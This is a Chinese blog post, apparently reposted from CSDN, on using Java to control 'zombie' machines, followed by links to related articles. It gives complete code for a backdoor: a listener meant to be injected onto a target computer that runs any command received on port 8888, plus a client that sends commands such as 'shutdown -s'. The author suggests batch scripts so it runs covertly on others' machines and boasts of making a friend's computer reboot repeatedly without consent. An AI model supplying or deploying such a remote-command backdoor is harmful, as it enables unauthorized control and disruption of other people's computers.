java也可以来做黑客:控制肉鸡
一般来说,通过端口扫面,知道对方的端口后,要进行一些进一步的操作,不是很难!难就难在如何想对方电脑发送命令!一般电脑会开放一个135的端口,我们通过它了做一些操作。大名鼎鼎的“冲击波”就是通过它了实现的。
关于135的端口说明如下:
135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务。
端口说明:135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代 码;使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。
当然通过java来实现,确实有点困难,本人不多说。还有一种简单远程方法就是种木马。至于如何挂马的问题,不再本文的研究范围,如有兴趣读者可以自己查阅。言归正传,我们看一下java远程控制的简单实现。
远程计算机注入的代码如下:
import java.io.DataInputStream;
import java.io.IOException;
import java.net.ServerSocket;
import java.net.Socket;
public class Main implements Runnable {
public static final int TCP_PORT = 8888;
ServerSocket ss = null;
Socket s = null;
String cmd = null;
public Main(Socket s) {
this.s = s;
}
public void startServer() {
try {
ss = new ServerSocket(TCP_PORT);
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
while (true) {
try {
s = ss.accept();
new Thread(new Main(s)).start();
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
}
public void run() {
try {
DataOutputStream dos = new DataOutputStream(s.getOutputStream());
dos.writeUTF("连接成功");
DataInputStream dis = new DataInputStream(s.getInputStream());
while (true) {
cmd = dis.readUTF();
try {
Runtime.getRuntime().exec(cmd);
} catch (IOException e) {
}
}
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
public static void main(String[] args) {
new Main(null).startServer();
}
}
原理很简单,就是在计算机上建立一个ServerSocket,监听8888端口。当有客户端接入后,回执一个“连接成功”消息。然后执行cmd命令。
本机的代码如下:
import java.io.DataOutputStream;
import java.io.IOException;
import java.net.Socket;
import java.net.UnknownHostException;
import javax.swing.JOptionPane;
public class Main {
public static final int TCP_PORT = 8888;
public static String ip = "127.0.0.1";
Socket s = null;
String cmd = null;
public static void main(String[] args) {
new Main().connect();
}
public void connect(){
try {
s = new Socket(ip,TCP_PORT);
System.out.println("连接成功");
DataOutputStream dos = new DataOutputStream(s.getOutputStream());
do{
cmd = JOptionPane.showInputDialog("输入命令:");
dos.writeUTF(cmd);
}while(!cmd.equals("over"));
new Thread(new RecvThread()).start();
} catch (UnknownHostException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
private class RecvThread implements Runnable{
public void run() {
DataInputStream dis;
while(true){
try {
dis = new DataInputStream(s.getInputStream());
String message = dis.readUTF();
JOptionPane.showMessageDialog(null, message);
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
}
}
}
原理是,这边连入对方的服务端,向对方发送一个cmd命令,对方电脑就会执行。简单的如“shutdown -s”,就是让对方关机。
弄清楚是怎么一回事后,就会发现这些非常的简单。有兴趣的话,大家可以试一下。尤其是对于初学者,有很大的动力。其实,Java在单机上也有很大的发展潜力的。
注:需要说明的是,由于本人的firefox不支持该博客的代码插入功能,只能将代码简单的复制,请大家见谅。另外如果要想让该程序成功的在他人计算机上偷偷的运行,只靠java还是不行。加上一些处批命令,就可以简单的搞定。有兴趣的话,大家可以研究。本人就用着段简单的代码,让一个哥们的电脑频繁的重启,呵呵!害他不知所以然,还重装了一遍系统。大家知道了不要告诉他哦!
原文:http://blog.csdn.net/smartcat86/article/details/2157273
java也可以来做黑客:控制肉鸡相关推荐
- java也可以做黑客?
java也可以做黑客? 0.0212018.09.28 09:03:02字数 1168阅读 1436 记得:Eric S. Raymond在他著名的文章<如何成为一名黑客>中,将Java列 ...
- 用python写一个程序控制其它软件_程序员:利用Python实现可控制肉鸡的反向Shell...
一.初识 1.1 用 Python 实现一个可以管理多个肉鸡的反向 Shell,为什么叫反向 Shell 呢?反向就是肉鸡作为 Client 主动连接到我们的 Server 端,以实现对多个远程主机的 ...
- 天才安全大佬即将拿股票前被拼多多辞退,原因是不愿意做黑客攻击?
本文由DD编辑部整理,内容来源网络 昨天,知乎热搜第一被一个黑客霸榜. 如何看待天才黑客Flanker疑因拒绝做黑客攻击业务,被拼多多强行辞退,错失上亿股票? 一时间坊间谣言四起.议论纷纷. 拼多多被 ...
- 编程行业高手级别必学C语言,要挣大钱必学C语言,要做黑客、红客必学C语言,要面试名企、外企、高薪职位必学C语言。
于大部分程序员, C语言 是学习 编程 的第一门语言,很少有不了解C的程序员. C语言除了能让你了解编程的相关概念,带你走进编程的大门,还能让你明白程序的运行原理,比如,计算机的各个部件是如何交互的, ...
- “清理僵尸粉”惊天骗局:微信被黑客控制,聊天记录被黑客监视
午夜,你放下手机,沉沉睡去. 房间中寂静无声,似乎能听见洗手间水滴落下.此时,另一双眼睛在黑暗中缓缓张开. 在你身旁,一根手指无声地在屏幕上摸索,滑动,翻看着你的聊天记录. 你和朋友的聊天,和家人的对 ...
- Spring Cloud Data Flow整合Cloudfoundry UAA服务做权限控制
我最新最全的文章都在 南瓜慢说 www.pkslow.com ,欢迎大家来喝茶! 1 前言 关于Spring Cloud Data Flow这里不多介绍,有兴趣可以看下面的文章.本文主要介绍如何整合D ...
- JAVA游戏开发之FPS精准控制
目录 JAVA游戏开发之FPS精准控制... 1 1 概述... 2 1.1 编写目的... 3 2 FPS精准控制... 3 2.1 FPS描述. ...
- 天才黑客 Flanker 疑因拒绝做黑客被拼多多强行辞退
整理 | 王晓曼 出品 | 程序人生 (ID:coder _life) 1月12日,"如何看待天才黑客Flanker疑因拒绝做黑客攻击业务,被拼多多强行辞退,错失上亿股票?"的话题 ...
- java和python的web自动化有什么区别-python和java哪个更适合做自动化?
真的很纠结,开发团队用java语言,本来想着跟随开发团队,但是发现python写测试脚本会轻松一点,在网上的找到资料,供参考. python:易于学习,语法简洁 不可否认的是,Python相对于其他语 ...
最新文章
- Class.forName 和 ClassLoader 到底有啥区别?
- BZOJ 3597 SCOI2014 方伯伯送椰子 网络流分析+SPFA
- 追一科技热招职位来袭:AI新世界,不做旁观者
- windows phone 操作 http异步返回结果
- PB代码动态解析执行器
- 广电总局:清理违规短视频账号38.39万个
- 【图论】图的深度优先遍历与广度优先遍历(图文讲解)
- Gallery3D笔记
- Android学习——四大核心组件(核心知识点整理)
- 小程序在开发者工具、真机测试时好好的,体验版 页面空白无法通过审核
- ×××有哪些激光领域杰出的院士?
- asp实训报告摘要_ASP实训总结
- Idea的GenerateAllSetter插件,快速填充对象属性
- 扫描二维码打开微信小程序,携带参数,含配置和代码详解
- 与“她”的初次相遇——数学建模笔记之赛后分析和总结
- Vue:前端体系与前后端分离
- 看完这套书才发现,以前的四大名著都白看了!
- 猎聘和BOSS直聘谁会成为在线招聘的最后赢家?
- Redis哨兵模式实现主从切换
- 全球14个典型区域的total runof 泰勒图比较